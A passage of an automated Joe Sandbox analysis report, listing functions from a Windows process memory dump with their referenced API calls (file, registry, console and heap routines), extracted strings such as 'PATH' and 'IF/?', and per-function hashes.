                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                    • String ID:
                                                                    • API String ID: 1403193329-0
                                                                    • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                    • Instruction ID: 88171c755baa501a8c79793712171734310d4cf861c421a91f794d1a4a26c21e
                                                                    • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                    • Instruction Fuzzy Hash: 4451A726A05E8185EB29EF21D9006B9B7B2FF547ACF858535CA0D07694EF3CD54E8730
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00007FF71966921C
                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7196693AA
                                                                      • Part of subcall function 00007FF719668B20: wcsrchr.MSVCRT ref: 00007FF719668BAB
                                                                      • Part of subcall function 00007FF719668B20: _wcsicmp.MSVCRT ref: 00007FF719668BD4
                                                                      • Part of subcall function 00007FF719668B20: _wcsicmp.MSVCRT ref: 00007FF719668BF2
                                                                      • Part of subcall function 00007FF719668B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719668C16
                                                                      • Part of subcall function 00007FF719668B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF719668C2F
                                                                      • Part of subcall function 00007FF719668B20: wcschr.MSVCRT ref: 00007FF719668CB3
                                                                      • Part of subcall function 00007FF71967417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7196741AD
                                                                      • Part of subcall function 00007FF719673060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7196692AC), ref: 00007FF7196730CA
                                                                      • Part of subcall function 00007FF719673060: SetErrorMode.KERNELBASE ref: 00007FF7196730DD
                                                                      • Part of subcall function 00007FF719673060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7196730F6
                                                                      • Part of subcall function 00007FF719673060: SetErrorMode.KERNELBASE ref: 00007FF719673106
                                                                    • wcsrchr.MSVCRT ref: 00007FF7196692D8
                                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719669362
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF719669373
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                    • String ID:
                                                                    • API String ID: 3966000956-0
                                                                    • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                    • Instruction ID: ed727e574e4fd8e851100a7045bd0702257681d3a6904c8bc64e371b9229b4a3
                                                                    • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                    • Instruction Fuzzy Hash: E4518432A09E8285EB65AF21D4502F9A3B2FB49B68F844035DE4D07795DF3CE55AC720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_setjmp
                                                                    • String ID:
                                                                    • API String ID: 3883041866-0
                                                                    • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                    • Instruction ID: 132074816384a7ebe5e0b991cb73deeac857b03c4a670cf353b84469d1e3f2cc
                                                                    • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                    • Instruction Fuzzy Hash: 65512E32A08B868AEB61DF21D8503E9B7B5EB49758F804135DA4D87A48DF3CD64AC720
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 00007FF71966B4BD
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706D6
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706F0
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF71967074D
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF719670762
                                                                    • _wcsicmp.MSVCRT ref: 00007FF71966B518
                                                                    • _wcsicmp.MSVCRT ref: 00007FF71966B58B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                    • String ID: ELSE$IF/?
                                                                    • API String ID: 3223794493-1134991328
                                                                    • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                    • Instruction ID: 05cc6fb7a94b58233f3d0d52d0cb4d6e9ea0017579c7e6f5794bcfc879381fe9
                                                                    • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                    • Instruction Fuzzy Hash: 48412621E0DE42C2FB55BF34A5112B9A6B3AF44B6CFD45035D60E46396EE3CE80A8770
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                    • String ID:
                                                                    • API String ID: 1532185241-0
                                                                    • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                    • Instruction ID: cb0f8a83dcb8cca79b71fa7f5ae11a5554694305e485e17a70541ac43879bce4
                                                                    • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                    • Instruction Fuzzy Hash: 3D41A332A14B51CBE714BF21984597DF6B2FB88B64F845535EA0E47790CF3CE84A8720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 3588551418-0
                                                                    • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                    • Instruction ID: 1a230799c2c105c8096adc06f1bd386441942fd9f2a4f2f33ac2a619edf5329b
                                                                    • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                    • Instruction Fuzzy Hash: 66418F31A08A42CBE724AF51945167DF672EF85BA9F944039DA0E47791CF2CE88A8770
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                    • String ID:
                                                                    • API String ID: 2123716050-0
                                                                    • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                    • Instruction ID: 4a3bde62f125f4988a734d783a79bcbabe520a1c00fe35d1f7525deae7242a43
                                                                    • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                    • Instruction Fuzzy Hash: 5F41E572705FC18AEB36AF21D9413E9A7A5FB4979CF444034DB4D4AA98DF3CE2498720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                    • String ID:
                                                                    • API String ID: 3114114779-0
                                                                    • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                    • Instruction ID: deb4ab484478f7c146412dc27d5ff031f2ad4bc45091ab3bcd8be3f064f78acc
                                                                    • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                    • Instruction Fuzzy Hash: B6411832A05F42DAE700EF65E4402ADBBB6FB88759F944135DA0D93B54DF38D81AC760
                                                                    APIs
                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A77A
                                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A7AF
                                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A80E
                                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A839
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF719689A82), ref: 00007FF71968A850
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseErrorLastOpen
                                                                    • String ID:
                                                                    • API String ID: 2240656346-0
                                                                    • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                    • Instruction ID: d194323d65241653c7bc59c012859384bad4d1069d7d8e82d89d827c71b731b9
                                                                    • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                    • Instruction Fuzzy Hash: 3F317C32A18F41C6EB50AF15E44056DF6B6FB897A4F945134EE8E42764EF3CD84A8B30
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196701B8: _get_osfhandle.MSVCRT ref: 00007FF7196701C4
                                                                      • Part of subcall function 00007FF7196701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF7196701D6
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71968D0F9
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71968D10F
                                                                    • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71968D166
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71968D17A
                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71968D18C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 3008996577-0
                                                                    • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                    • Instruction ID: 9b32c4599148852f7d197280797242d90b34dd00e1bf6ae60ad7fb96e18bfbd6
                                                                    • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                    • Instruction Fuzzy Hash: 4F214A36A14A41CAE700AF71E4104BDB7B1FB4DB68B845125EE4D53B58DF38D04ACB34
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSemaphore
                                                                    • String ID: _p0$wil
                                                                    • API String ID: 1078844751-1814513734
                                                                    • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                    • Instruction ID: 38b3f02eb2097d2d80273daa1f67c3de7badf78c644563e7a528a99c1c3e1697
                                                                    • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                    • Instruction Fuzzy Hash: 3851C561B19F92C6EE61AF1484556B9E2B2AF84BA8FD44475DA0D07788DE3CE40F8370
                                                                    APIs
                                                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF71968B934
                                                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF719675085), ref: 00007FF71968B9A5
                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF719675085), ref: 00007FF71968B9F7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                    • String ID: %WINDOWS_COPYRIGHT%
                                                                    • API String ID: 1103618819-1745581171
                                                                    • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                    • Instruction ID: 63c65177031ff49b1d4bbf0a29002591f2cf23858e2d39a13398270d5702060a
                                                                    • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                    • Instruction Fuzzy Hash: D2419462908F81C6EA109F259411279F3B2FB49BA8FC55231DA4D03395EF3CE44AC320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_wcslwr
                                                                    • String ID: [%s]
                                                                    • API String ID: 886762496-302437576
                                                                    • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                    • Instruction ID: 1e9cea9eb13ff58b0480fa9f2f29c92c8ca3e02f0a56331840334370decb76a7
                                                                    • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                    • Instruction Fuzzy Hash: C2316A32705B8289EB21EF21D9503E9A7A1FB88B98F844075DA4D47755DF3CD64AC720
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196733A8: iswspace.MSVCRT(?,?,00000000,00007FF71968D6EE,?,?,?,00007FF719680632), ref: 00007FF7196733C0
                                                                    • iswspace.MSVCRT(?,?,?,00007FF7196732A4), ref: 00007FF71967331C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswspace
                                                                    • String ID: off
                                                                    • API String ID: 2389812497-733764931
                                                                    • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                    • Instruction ID: f8c21433a2b98cd765e7bff343717dc05620df86762fa3272aaf68edb3a5631a
                                                                    • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                    • Instruction Fuzzy Hash: 23219021E0CE8385FA787F15B452679E6B2EF45BB8FC88035D90E47694DE2CE44A8331
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                    • String ID: %s=%s$DPATH$PATH
                                                                    • API String ID: 3731854180-3148396303
                                                                    • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                    • Instruction ID: f79ff0a9d6b4ccee6de55c743b1c080414588b2233effb9c51f6419fd591fa8d
                                                                    • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                    • Instruction Fuzzy Hash: 8F21BB21B09F5286EE18AF55E441279E3B2AF84FA8FC84035CD0E47394DE2CE44A8370
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
